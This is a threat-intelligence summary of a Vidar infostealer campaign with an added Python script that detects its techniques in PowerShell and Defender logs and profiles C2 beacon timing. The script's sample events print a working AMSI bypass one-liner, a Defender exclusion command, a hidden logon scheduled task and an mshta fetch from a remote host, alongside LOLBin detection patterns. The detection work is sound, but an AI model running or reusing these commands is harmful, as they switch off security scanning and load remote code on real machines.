Vidar infostealer infection chain analysis adds PowerShell evasion, AMSI bypass, and TLS C2 details
Technical Analysis
Summary
Researchers at Aryaka identified a newer Vidar infection chain that combines PowerShell staging, Living-off-the-Land Binaries (LOLBins), and an AMSI bypass attempt to evade detection on Windows hosts. The malware also adds persistence through a hidden scheduled task that fires at user logon and talks to its C2 over TLS, which makes both execution and exfiltration harder to spot. The findings matter because Vidar keeps improving its stealth and reliability while affiliates steal credentials, cookies, tokens, and financial data. The analysis gives defenders concrete behaviors to monitor: randomized file paths, jittered reconnects to the C2, and abuse of Windows Defender exclusions (the report calls them "exceptions") to keep the stager and payload out of scans.
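The behaviors listed above map well onto two kinds of Windows telemetry: PowerShell ScriptBlock logging (Event ID 4104) for the staging, AMSI bypass, Defender exclusion and scheduled-task commands, and network flow timing for the jittered reconnects. The script below is an added example, not code from Aryaka's report or from Vidar; it runs a small rule set over constructed sample events and profiles constructed beacon timestamps. The regex patterns are generic indicators for each technique class (assumed, not Vidar-specific IOCs), the Event ID 5007 registry path and the LOLBin list are assumptions, and the only detail taken from the report is the `Download-Reliable` function name. Randomized paths are not handled here; they need a per-host baseline rather than a pattern.

```python
"""Added example: flag the behaviour classes named in the Vidar summary in
constructed PowerShell 4104 / Defender 5007 events and beacon timing data."""
import re
from collections import Counter
from statistics import mean, pstdev

# Constructed records shaped like PowerShell ScriptBlock logging (Event ID 4104)
# and Microsoft Defender configuration-change events (Event ID 5007). They are
# illustrative, not captured Vidar telemetry; only the Download-Reliable name
# comes from the write-up summarised above. Paths and hosts are made up.
SAMPLE_EVENTS = [
    {"id": 4104, "text": "function Download-Reliable { param($u, $o) Invoke-WebRequest -Uri $u -OutFile $o }"},
    {"id": 4104, "text": "Add-MpPreference -ExclusionPath \"$env:APPDATA\\q7x2k\""},
    {"id": 4104, "text": "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)"},
    {"id": 4104, "text": "schtasks /create /sc onlogon /tn \"OneDrive Sync\" /tr \"powershell -w hidden -ep bypass -f C:\\Users\\Public\\q7x2k\\run.ps1\""},
    {"id": 4104, "text": "mshta http://203.0.113.10/x.hta"},
    {"id": 5007, "text": "HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths\\C:\\Users\\Public\\q7x2k = 0x0"},
    {"id": 4104, "text": "Get-ChildItem -Path C:\\Windows\\Temp | Measure-Object"},  # benign
]

# One rule per behaviour class. Patterns are generic technique indicators
# (assumption), not Vidar-specific IOCs; tune them against your own baseline.
RULES = [
    ("defender_exclusion", re.compile(
        r"Add-MpPreference\s+-Exclusion(Path|Process|Extension)|Windows Defender\\Exclusions\\", re.I)),
    ("amsi_bypass", re.compile(r"AmsiUtils|amsiInitFailed|AmsiScanBuffer", re.I)),
    ("logon_scheduled_task", re.compile(
        r"schtasks(\.exe)?\s+/create.*?/sc\s+onlogon|New-ScheduledTaskTrigger\s+-AtLogOn", re.I)),
    ("hidden_bypass_powershell", re.compile(r"-w(indowstyle)?\s+hidden|-e(xecutionpolicy|p)\s+bypass", re.I)),
    ("lolbin_stager", re.compile(r"\b(mshta|rundll32|regsvr32|certutil|bitsadmin)(\.exe)?\b", re.I)),
    ("staging_helper_name", re.compile(r"Download-Reliable", re.I)),
]


def classify(event):
    """Return the names of every rule that fires on one event, in rule order."""
    return [name for name, rx in RULES if rx.search(event["text"])]


def scan(events):
    """Return (flagged, counts): flagged events with their hits, and a hit Counter."""
    flagged, counts = [], Counter()
    for ev in events:
        hits = classify(ev)
        if hits:
            flagged.append((ev["id"], hits, ev["text"]))
            counts.update(hits)
    return flagged, counts


# Constructed connection timestamps (seconds) for one host -> one destination.
# A sleep of ~60 s with random jitter versus interactive, bursty traffic.
JITTERED_BEACON = [0, 58, 121, 177, 242, 298, 361]
IRREGULAR_TRAFFIC = [0, 5, 300, 310, 900, 905]


def beacon_profile(timestamps, min_samples=5):
    """Summarise reconnect timing as (mean_gap, coefficient_of_variation, label).

    A fixed-interval beacon has CV near 0, a beacon with sleep jitter has a small
    but non-zero CV, and human-driven traffic is far more irregular. The 0.02 and
    0.5 cut-offs are assumed starting points, not tuned thresholds.
    """
    if len(timestamps) < min_samples:
        return None
    ts = sorted(timestamps)
    gaps = [b - a for a, b in zip(ts, ts[1:])]
    m = mean(gaps)
    cv = pstdev(gaps) / m if m else float("inf")
    label = "fixed" if cv < 0.02 else "jittered" if cv < 0.5 else "irregular"
    return m, cv, label


if __name__ == "__main__":
    flagged, counts = scan(SAMPLE_EVENTS)
    for event_id, hits, text in flagged:
        print(f"{event_id} {','.join(hits)}: {text[:70]}")
    print(dict(counts))
    print(beacon_profile(JITTERED_BEACON), beacon_profile(IRREGULAR_TRAFFIC))
```

Scoring the rule hits per host rather than alerting on each one keeps the noise down: an admin legitimately adding a Defender exclusion trips one rule, while the chain described above trips exclusion, AMSI, hidden PowerShell, and logon-task rules on the same host within minutes. The beacon profile is a triage aid for TLS C2 where payload inspection is not possible; confirm with the destination's reputation and certificate before acting on timing alone.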
Related Happenings
Vidar infostealer market rise and distribution expansion
Malware Activity
First: 28.04.2026 22:07
Last: 28.04.2026 22:07
Sources 1
How related:
That is according to researchers at cybersecurity vendor Aryaka, which published research last week dedicated to a fresh campaign involving the malware-as-a-service Vidar that has emerged in recent weeks.
About this happening:
**Vidar** remains a long-running **infostealer** threat, and **Aryaka** reported a fresh campaign in **recent weeks** that adds **new obfuscation techniques** and stronger **steal...
Lumma Stealer infection of a Context.ai employee
Malware Activity
First: 23.04.2026 11:40
Last: 23.04.2026 11:40
Sources 1
About this happening:
A **Context.ai** employee was infected with **Lumma Stealer** in **February 2026**, giving attackers a likely foothold that may have seeded the wider compromise chain affecting **...
The Gentlemen affiliate-driven RaaS expansion and enterprise scale-up
Threat Actor Meta
First: 21.04.2026 17:00
Last: 21.04.2026 17:00
Sources 1
About this happening:
**The Gentlemen ransomware gang** is using a **legitimate vulnerable driver** to defeat enterprise defenses, weaponizing **ThrottleStop.sys** as **ThrottleBlood.sys** to kill **AV...
Venom Stealer MaaS continuous credential theft and exfiltration
Malware Activity
First: 01.04.2026 16:30
Last: 01.04.2026 16:30
Sources 1
About this happening:
The **Venom Stealer** **malware-as-a-service** platform has been identified as a **credential-theft** threat that keeps exfiltrating data after infection, extending the window for...
TeamPCP and Vect partner to turn supply-chain compromises into ransomware follow-on campaigns
Threat Actor Meta
First: 31.03.2026 15:15
Last: 31.03.2026 15:15
Sources 1
About this happening:
TeamPCP and **Vect ransomware group** are linking **supply-chain compromises** to **follow-on ransomware campaigns**, broadening extortion risk for affected organizations. The shi...
Timeline
- 11.09.2025 19:23 · 2 articles · 8mo ago
Aryaka details Vidar evasion and persistence techniques
Technical Analysis Update: Aryaka Threat Research Lab described a new Vidar infostealer campaign affecting Windows machines. The malware uses a PowerShell staging chain with a custom Download-Reliable() function, encrypted command-and-control channels, Living-off-the-Land Binaries (LOLBins), Windows Defender exception abuse, AMSI bypass attempts, a hidden scheduled task triggered at user logon, and TLS-encrypted exfiltration, and it steals credentials, cookies, tokens, and financial data.
- Vidar Infostealer Back With a Vengeance — www.darkreading.com — 11.09.2025 19:23